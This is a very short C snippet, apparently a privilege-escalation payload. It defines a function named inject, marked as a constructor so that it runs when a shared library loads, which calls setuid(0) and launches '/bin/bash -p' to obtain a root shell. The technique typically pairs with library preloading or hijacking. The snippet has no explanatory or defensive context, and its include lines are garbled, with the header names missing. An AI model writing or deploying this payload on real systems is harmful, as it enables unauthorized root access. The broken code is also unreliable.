#include #include static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); }